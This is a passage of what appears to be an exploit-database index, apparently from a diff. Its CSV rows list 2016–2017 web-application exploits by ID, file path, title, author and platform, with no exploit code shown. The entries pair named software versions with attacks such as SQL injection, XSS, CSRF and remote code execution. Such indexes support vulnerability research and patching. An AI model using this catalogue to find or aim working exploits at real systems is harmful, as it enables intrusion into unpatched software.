+40285,exploits/php/webapps/40285.txt,"Ocomon 2.0 - SQL Injection",2016-08-22,"Jonatas Fil",webapps,php,80 +40286,exploits/java/webapps/40286.txt,"Sakai 10.7 - Multiple Vulnerabilities",2016-08-22,LiquidWorm,webapps,java, +40288,exploits/php/webapps/40288.txt,"WordPress 4.5.3 - Directory Traversal / Denial of Service",2016-08-22,"Yorick Koster",webapps,php,80 +40290,exploits/php/webapps/40290.txt,"WordPress Plugin Mail Masta 1.0 - Local File Inclusion",2016-08-23,"Guillermo Garcia Marcos",webapps,php,80 +40292,exploits/php/webapps/40292.txt,"SimplePHPQuiz - Blind SQL Injection",2016-08-23,HaHwul,webapps,php,80 +40293,exploits/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,webapps,php,80 +40295,exploits/php/webapps/40295.txt,"WordPress Plugin CYSTEME Finder 1.3 - Arbitrary File Disclosure/Arbitrary File Upload",2016-08-24,T0w3ntum,webapps,php,80 +40312,exploits/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,webapps,php, +40324,exploits/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials SYSTEM Remote Code Execution",2016-08-31,LiquidWorm,webapps,jsp,8088 +40325,exploits/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - Cross-Site Request Forgery (Add Superadmin)",2016-08-31,LiquidWorm,webapps,jsp,8088 +40326,exploits/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,webapps,jsp,8088 +40327,exploits/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass",2016-08-31,LiquidWorm,webapps,jsp, +40328,exploits/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,webapps,jsp,8088 +40454,exploits/php/webapps/40454.txt,"Picosafe Web GUI - Multiple Vulnerabilities",2016-10-05,"Shahab Shamsi",webapps,php, +40462,exploits/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,webapps,cgi, +40467,exploits/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,webapps,php, +40468,exploits/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,webapps,php, +40469,exploits/php/webapps/40469.txt,"MLM Unilevel Plan Script 1.0.2 - SQL Injection",2016-10-06,N4TuraL,webapps,php, +40470,exploits/php/webapps/40470.txt,"Just Dial Clone Script - 'fid' SQL Injection",2016-10-06,OoN_Boy,webapps,php, +40475,exploits/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,webapps,php, +40479,exploits/php/webapps/40479.txt,"Entrepreneur Job Portal Script 2.06 - SQL Injection",2016-10-07,OoN_Boy,webapps,php, +40480,exploits/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,webapps,php, +40481,exploits/php/webapps/40481.txt,"ShoreTel Connect ONSITE - Blind SQL Injection",2016-09-19,"Iraklis Mathiopoulos",webapps,php, +40486,exploits/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,webapps,php, +40487,exploits/php/webapps/40487.txt,"PHP Press Release - Persistent Cross-Site Scripting",2016-10-09,Besim,webapps,php, +40492,exploits/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,webapps,php, +40493,exploits/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,webapps,php, +40495,exploits/php/webapps/40495.html,"BirdBlog 1.4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,webapps,php,80 +40496,exploits/php/webapps/40496.html,"phpEnter 4.2.7 - Cross-Site Request Forgery (Add New Post)",2016-10-11,Besim,webapps,php,80 +40500,exploits/cgi/webapps/40500.py,"AVTECH IP Camera / NVR / DVR Devices - Multiple Vulnerabilities",2016-10-11,"Gergely Eberhardt",webapps,cgi,80 +40501,exploits/xml/webapps/40501.txt,"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection",2016-10-11,"SEC Consult",webapps,xml, +40505,exploits/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting",2016-10-11,Besim,webapps,php, +40506,exploits/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)",2016-10-11,Besim,webapps,php, +40511,exploits/php/webapps/40511.txt,"Categorizator 0.3.1 - SQL Injection",2016-10-12,Wadeek,webapps,php, +40512,exploits/php/webapps/40512.txt,"NetBilletterie 2.8 - Multiple Vulnerabilities",2016-10-12,Wadeek,webapps,php, +40516,exploits/php/webapps/40516.txt,"ApPHP MicroCMS 3.9.5 - Persistent Cross-Site Scripting",2016-10-12,Besim,webapps,php, +40513,exploits/php/webapps/40513.txt,"OpenCimetiere 3.0.0-a5 - Blind SQL Injection",2016-10-12,Wadeek,webapps,php, +40517,exploits/php/webapps/40517.html,"ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin)",2016-10-12,Besim,webapps,php, +40526,exploits/php/webapps/40526.txt,"Colorful Blog - Persistent Cross-Site Scripting",2016-10-13,Besim,webapps,php, +40527,exploits/php/webapps/40527.txt,"Colorful Blog - Cross-Site Request Forgery (Change Admin Password)",2016-10-13,Besim,webapps,php, +40529,exploits/php/webapps/40529.txt,"RSS News AutoPilot Script 1.0.1/3.1.0 - Admin Panel Authentication Bypass",2016-10-13,"Arbin Godar",webapps,php, +40530,exploits/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,webapps,php, +40531,exploits/php/webapps/40531.txt,"Simple Forum PHP 2.4 - SQL Injection",2016-10-14,"Ehsan Hosseini",webapps,php, +40532,exploits/php/webapps/40532.html,"Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)",2016-10-14,"Ehsan Hosseini",webapps,php, +40534,exploits/php/webapps/40534.html,"YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-14,"Arbin Godar",webapps,php, +40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php, +40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php, +40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php, +40545,exploits/php/webapps/40545.txt,"Learning Management System 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php, +40546,exploits/php/webapps/40546.txt,"Fashion Shopping Cart 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php, +40547,exploits/php/webapps/40547.txt,"Health Record System 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php, +40552,exploits/php/webapps/40552.txt,"PHP Telephone Directory - Multiple Vulnerabilities",2016-10-16,larrycompress,webapps,php, +40553,exploits/php/webapps/40553.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting",2016-10-17,"Ahsan Tahir",webapps,php,80 +40554,exploits/php/webapps/40554.txt,"PHP Image Database - Multiple Vulnerabilities",2016-10-16,larrycompress,webapps,php, +40555,exploits/php/webapps/40555.txt,"Simple Shopping Cart Application 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php, +40557,exploits/php/webapps/40557.html,"PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)",2016-10-16,"Meryem AKDOĞAN",webapps,php, +40558,exploits/php/webapps/40558.txt,"School Full CBT 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php, +40559,exploits/php/webapps/40559.txt,"PHP Business Directory - Multiple Vulnerabilities",2016-10-17,larrycompress,webapps,php, +40566,exploits/php/webapps/40566.py,"Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page)",2016-10-18,"Ahsan Tahir",webapps,php, +40569,exploits/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,webapps,java, +40571,exploits/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",webapps,cgi,80 +40576,exploits/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",webapps,php, +40584,exploits/php/webapps/40584.txt,"Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation",2016-10-19,"Joey Lane",webapps,php, +40590,exploits/xml/webapps/40590.txt,"Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 - XML External Entity Injection",2016-10-20,"Jakub Palaczynski",webapps,xml, +40591,exploits/php/webapps/40591.txt,"Classifieds Rental Script - SQL Injection",2016-10-20,"Arbin Godar",webapps,php, +40594,exploits/php/webapps/40594.txt,"Event Calendar PHP 1.5 - SQL Injection",2016-10-20,"Ehsan Hosseini",webapps,php, +40595,exploits/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,webapps,php,80 +40596,exploits/php/webapps/40596.txt,"SPIP 3.1.1/3.1.2 - File Enumeration / Path Traversal",2016-10-20,Sysdream,webapps,php,80 +40597,exploits/php/webapps/40597.txt,"SPIP 3.1.2 - Cross-Site Request Forgery",2016-10-20,Sysdream,webapps,php,80 +40612,exploits/php/webapps/40612.txt,"Just Dial Clone Script - 'srch' SQL Injection",2016-10-21,"Arbin Godar",webapps,php, +40614,exploits/php/webapps/40614.py,"FreePBX 13 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",webapps,php, +40620,exploits/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,webapps,php, +40626,exploits/hardware/webapps/40626.txt,"Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery",2016-10-24,BlackMamba,webapps,hardware, +40628,exploits/php/webapps/40628.pl,"EC-CUBE 2.12.6 - Server-Side Request Forgery",2016-10-24,Wadeek,webapps,php, +40629,exploits/hardware/webapps/40629.txt,"Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management",2016-10-24,"Sniper Pex",webapps,hardware, +40631,exploits/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",webapps,php, +40642,exploits/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,webapps,php, +40644,exploits/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,webapps,php, +40645,exploits/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,webapps,php, +40641,exploits/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting Vulnerabilities",2016-10-28,LiquidWorm,webapps,php, +40646,exploits/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,webapps,php, +40640,exploits/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Command Execution",2016-10-28,LiquidWorm,webapps,hardware, +40637,exploits/php/webapps/40637.txt,"Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation",2016-10-27,"Xiphos Research Ltd",webapps,php,80 +40650,exploits/php/webapps/40650.txt,"S9Y Serendipity 2.0.4 - Cross-Site Scripting",2016-10-31,Besim,webapps,php, +40671,exploits/php/webapps/40671.txt,"School Registration and Fee System - Authentication Bypass",2016-11-01,opt1lc,webapps,php, +40682,exploits/php/webapps/40682.txt,"Alienvault OSSIM/USM 5.3.1 - PHP Object Injection",2016-11-02,"Peter Lapp",webapps,php, +40683,exploits/php/webapps/40683.txt,"Alienvault OSSIM/USM 5.3.1 - Persistent Cross-Site Scripting",2016-11-02,"Peter Lapp",webapps,php, +40684,exploits/php/webapps/40684.txt,"Alienvault OSSIM/USM 5.3.1 - SQL Injection",2016-11-02,"Peter Lapp",webapps,php, +40690,exploits/hardware/webapps/40690.txt,"LifeSize Room 5.0.9 - Multiple Vulnerabilities",2016-11-02,"Xiphos Research Ltd",webapps,hardware, +40692,exploits/php/webapps/40692.html,"SweetRice 1.5.1 - Cross-Site Request Forgery",2016-11-02,"Ashiyane Digital Security Team",webapps,php, +40698,exploits/php/webapps/40698.py,"SweetRice 1.5.1 - Arbitrary File Download",2016-11-03,"Ashiyane Digital Security Team",webapps,php, +40700,exploits/php/webapps/40700.html,"SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution",2016-11-03,"Ashiyane Digital Security Team",webapps,php, +40701,exploits/php/webapps/40701.html,"ETchat 3.7 - Cross-Site Request Forgery",2016-11-03,"Hesam Bazvand",webapps,php, +40705,exploits/php/webapps/40705.html,"sNews 1.7.1 - Cross-Site Request Forgery",2016-11-03,Amir.ght,webapps,php, +40706,exploits/php/webapps/40706.txt,"sNews 1.7.1 - Arbitrary File Upload",2016-11-03,Amir.ght,webapps,php, +40707,exploits/php/webapps/40707.html,"nodCMS - Cross-Site Request Forgery",2016-11-03,Amir.ght,webapps,php, +40708,exploits/php/webapps/40708.html,"Redaxo 5.2.0 - Cross-Site Request Forgery",2016-11-03,Amir.ght,webapps,php, +40719,exploits/php/webapps/40719.txt,"Schoolhos CMS 2.29 - 'kelas' SQL Injection",2016-11-07,Vulnerability-Lab,webapps,php, +40723,exploits/php/webapps/40723.txt,"NodCMS - PHP Code Execution",2016-11-07,"Ashiyane Digital Security Team",webapps,php, +40724,exploits/php/webapps/40724.txt,"Piwik 2.16.0 - 'layout' PHP Object Injection",2016-11-07,"Egidio Romano",webapps,php,80 +40725,exploits/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,webapps,php, +40732,exploits/php/webapps/40732.txt,"WordPress Plugin 404 to 301 2.2.8 - Persistent Cross-Site Scripting",2016-11-08,"Alyssa Milburn",webapps,php,80 +40733,exploits/php/webapps/40733.txt,"WordPress Plugin WassUp Real Time Analytics 1.9 - Persistent Cross-Site Scripting",2016-11-08,"Burak Kelebek",webapps,php,80 +40742,exploits/windows/webapps/40742.txt,"Adobe Connect 9.5.7 - Cross-Site Scripting",2016-11-09,Vulnerability-Lab,webapps,windows, +40746,exploits/php/webapps/40746.php,"e107 CMS 2.1.2 - Privilege Escalation",2016-11-09,"Kacper Szurek",webapps,php, +40749,exploits/php/webapps/40749.txt,"MyBB 1.8.6 - Cross-Site Scripting",2016-11-10,"Curesec Research Team",webapps,php,80 +40750,exploits/php/webapps/40750.txt,"4Images 1.7.13 - SQL Injection",2016-11-10,0x4148,webapps,php, +40751,exploits/php/webapps/40751.txt,"vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",webapps,php, +40753,exploits/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,webapps,php, +40755,exploits/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",webapps,php, +40756,exploits/php/webapps/40756.py,"Boonex Dolphin 7.3.2 - Authentication Bypass / Remote Code Execution",2016-11-14,0x4148,webapps,php, +40771,exploits/php/webapps/40771.txt,"WordPress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",webapps,php, +40772,exploits/php/webapps/40772.txt,"WordPress Plugin Sirv 1.3.1 - SQL Injection",2016-11-17,"Lenon Leite",webapps,php, +40782,exploits/php/webapps/40782.txt,"WordPress Plugin BBS e-Franchise 1.1.1 - SQL Injection",2016-11-12,"Lenon Leite",webapps,php, +40783,exploits/php/webapps/40783.txt,"WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection",2016-11-12,"Lenon Leite",webapps,php, +40776,exploits/php/webapps/40776.txt,"EditMe CMS - Cross-Site Request Forgery (Add New Admin)",2016-11-18,Vulnerability-Lab,webapps,php, +40791,exploits/php/webapps/40791.txt,"ScriptCase 8.1.053 - Multiple Vulnerabilities",2016-11-20,hyp3rlinx,webapps,php, +40794,exploits/java/webapps/40794.txt,"Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal",2016-11-21,"Julien Ahrens",webapps,java, +40795,exploits/php/webapps/40795.html,"WordPress Plugin Instagram Feed 1.4.6.2 - Cross-Site Request Forgery",2016-11-21,"Sipke Mellema",webapps,php,80 +40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80 +40800,exploits/php/webapps/40800.txt,"LEPTON 2.2.2 - SQL Injection",2016-11-21,"Curesec Research Team",webapps,php,80 +40801,exploits/php/webapps/40801.txt,"LEPTON 2.2.2 - Remote Code Execution",2016-11-21,"Curesec Research Team",webapps,php,80 +40802,exploits/php/webapps/40802.txt,"FUDforum 3.0.6 - Cross-Site Scripting / Cross-Site Request Forgery",2016-11-21,"Curesec Research Team",webapps,php,80 +40803,exploits/php/webapps/40803.txt,"FUDforum 3.0.6 - Local File Inclusion",2016-11-21,"Curesec Research Team",webapps,php,80 +40804,exploits/php/webapps/40804.txt,"WordPress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",webapps,php, +40809,exploits/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,webapps,php, +40816,exploits/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,webapps,xml, +40826,exploits/php/webapps/40826.py,"osTicket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",webapps,php, +40895,exploits/multiple/webapps/40895.py,"Splunk Enterprise 6.4.3 - Server-Side Request Forgery",2016-12-09,Security-Assessment.com,webapps,multiple, +40837,exploits/hardware/webapps/40837.txt,"Tenda/Dlink/Tplink TD-W8961ND - 'DHCP' Cross-Site Scripting",2016-11-28,Vulnerability-Lab,webapps,hardware, +40842,exploits/java/webapps/40842.txt,"Red Hat JBoss EAP - Deserialization of Untrusted Data",2016-11-28,"Mediaservice.net Srl.",webapps,java,8080 +40850,exploits/php/webapps/40850.txt,"WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion",2016-11-30,"Lenon Leite",webapps,php, +40851,exploits/php/webapps/40851.txt,"Joomla! Component Catalog 1.0.7 - SQL Injection",2016-09-16,"Larry W. Cashdollar",webapps,php, +40852,exploits/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",webapps,php, +40853,exploits/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,webapps,hardware, +40856,exploits/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",webapps,hardware, +40877,exploits/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php, +40887,exploits/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,webapps,hardware, +40889,exploits/cgi/webapps/40889.txt,"NETGEAR R7000 - Command Injection",2016-12-07,Acew0rm,webapps,cgi, +40898,exploits/hardware/webapps/40898.txt,"NETGEAR R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",webapps,hardware, +40901,exploits/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",webapps,hardware, +40904,exploits/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",webapps,php, +40908,exploits/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,webapps,php,80 +40912,exploits/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' SQL Injection",2016-12-13,"Elar Lang",webapps,php,80 +40932,exploits/php/webapps/40932.txt,"WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection",2016-12-16,ZwX,webapps,php,80 +40934,exploits/php/webapps/40934.html,"WordPress Plugin Quiz And Survey Master 4.5.4/4.7.8 - Cross-Site Request Forgery",2016-12-16,dxw,webapps,php,80 +40939,exploits/php/webapps/40939.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection",2016-12-16,"Lenon Leite",webapps,php, +40940,exploits/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1)",2016-12-16,"Lenon Leite",webapps,php, +40941,exploits/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",webapps,php, +40942,exploits/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",webapps,multiple, +40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple, +40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php, +40968,exploits/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php, +40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",webapps,php, +40969,exploits/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",webapps,php, +40971,exploits/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",webapps,php, +40972,exploits/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",webapps,php, +40973,exploits/php/webapps/40973.txt,"Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection",2016-12-28,qemm,webapps,php, +40974,exploits/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution (Python)",2016-12-29,anarc0der,webapps,php, +40976,exploits/php/webapps/40976.txt,"WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload",2016-12-29,r3m1ck,webapps,php, +40977,exploits/hardware/webapps/40977.txt,"Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection",2016-12-29,LiquidWorm,webapps,hardware, +40978,exploits/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,webapps,hardware, +40979,exploits/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",webapps,php, +40982,exploits/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",webapps,hardware, +40983,exploits/hardware/webapps/40983.html,"D-Link DI-524 - Cross-Site Request Forgery",2016-12-09,"Felipe Soares de Souza",webapps,hardware, +40986,exploits/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",webapps,php, +40989,exploits/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",webapps,jsp, +40997,exploits/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,webapps,php, +40998,exploits/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",webapps,php, +40999,exploits/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' SQL Injection",2017-01-09,"Ihsan Sencan",webapps,php, +41027,exploits/php/webapps/41027.txt,"Dating Script 3.25 - SQL Injection",2017-01-11,"Dawid Morawski",webapps,php, +41001,exploits/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' SQL Injection",2017-01-09,"Sniper Pex",webapps,php, +41002,exploits/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' SQL Injection",2017-01-09,v3n0m,webapps,php, +41004,exploits/php/webapps/41004.txt,"Starting Page 1.3 - 'linkid' SQL Injection",2017-01-10,JaMbA,webapps,php, +41005,exploits/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,webapps,php, +41006,exploits/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",webapps,php, +41007,exploits/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",webapps,php, +41009,exploits/php/webapps/41009.txt,"Starting Page 1.3 - 'category' SQL Injection",2017-01-11,"Ben Lee",webapps,php, +41010,exploits/php/webapps/41010.txt,"My Link Trader 1.1 - 'id' SQL Injection",2017-01-11,"Dawid Morawski",webapps,php, +41011,exploits/php/webapps/41011.txt,"b2evolution 6.8.2 - Arbitrary File Upload",2016-12-29,"Li Fei",webapps,php, +41014,exploits/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,webapps,java, +41017,exploits/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery (1)",2017-01-10,Vulnerability-Lab,webapps,hardware, +41023,exploits/php/webapps/41023.txt,"Itech Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",webapps,php, +41024,exploits/php/webapps/41024.txt,"Itech Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",webapps,php, +41028,exploits/php/webapps/41028.txt,"Itech Job Portal Script 9.11 - Authentication Bypass",2017-01-12,"Dawid Morawski",webapps,php, +41029,exploits/php/webapps/41029.txt,"Online Food Delivery 2.04 - Authentication Bypass",2017-01-12,"Dawid Morawski",webapps,php, +41032,exploits/php/webapps/41032.pl,"iTechscripts Freelancer Script 5.11 - 'sk' SQL Injection",2017-01-11,v3n0m,webapps,php, +41033,exploits/hardware/webapps/41033.txt,"D-Link DIR-615 - Multiple Vulnerabilities",2017-01-10,"Osanda Malith",webapps,hardware, +41034,exploits/php/webapps/41034.txt,"School Management Software 2.75 - SQL Injection",2017-01-11,"Ihsan Sencan",webapps,php, +41036,exploits/php/webapps/41036.txt,"Penny Auction Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",webapps,php, +41037,exploits/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",webapps,php, +41038,exploits/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",webapps,php, +41040,exploits/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",webapps,linux, +41043,exploits/php/webapps/41043.txt,"My Private Tutor Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",webapps,php, +41044,exploits/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",webapps,php, +41045,exploits/php/webapps/41045.txt,"Just Dial Marketplace - Authentication Bypass",2017-01-13,"Ihsan Sencan",webapps,php, +41046,exploits/php/webapps/41046.txt,"Entrepreneur Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",webapps,php, +41047,exploits/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",webapps,php, +41048,exploits/php/webapps/41048.txt,"Inout StickBoard 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",webapps,php, +41049,exploits/php/webapps/41049.txt,"Inout Search Engine Ultimate Edition 7.0/8.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",webapps,php, +41050,exploits/php/webapps/41050.txt,"Inout Webmail Ultimate Edition 4.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",webapps,php, +41051,exploits/php/webapps/41051.txt,"Inout SmartDeal 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",webapps,php, +41052,exploits/php/webapps/41052.txt,"Inout QuerySpace 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",webapps,php, +41053,exploits/php/webapps/41053.txt,"Inout CareerLamp 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",webapps,php, +41054,exploits/php/webapps/41054.txt,"Inout SocialTiles 2.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",webapps,php, +41055,exploits/php/webapps/41055.txt,"Inout Celebrities 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",webapps,php, 